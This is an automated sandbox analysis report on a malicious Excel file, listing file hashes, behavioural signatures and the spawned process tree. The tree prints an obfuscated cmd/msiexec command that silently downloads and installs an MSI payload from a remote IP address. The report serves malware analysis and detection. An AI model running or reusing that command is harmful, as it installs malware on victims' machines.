Analysis
-
max time kernel
135s -
max time network
138s -
platform
windows10_x64 -
resource
win10 -
submitted
30-06-2020 12:08
General
-
Target
11203780.xls
-
Size
172KB
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Use of msiexec (install) with remote resource 1 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Windows directory 6 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\11203780.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/11203780.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemsiExec /i http://199.195.250.60/gg/11203780.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI9D1.tmp"C:\Windows\Installer\MSI9D1.tmp"2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Installer\MSI9D1.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
C:\Windows\Installer\MSI9D1.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
memory/808-7-0x0000000000000000-mapping.dmp
-
memory/2708-3-0x0000000000000000-mapping.dmp
-
memory/3264-4-0x0000000000000000-mapping.dmp
-
memory/3264-5-0x000002A80C2E0000-0x000002A80C2E4000-memory.dmpFilesize
16KB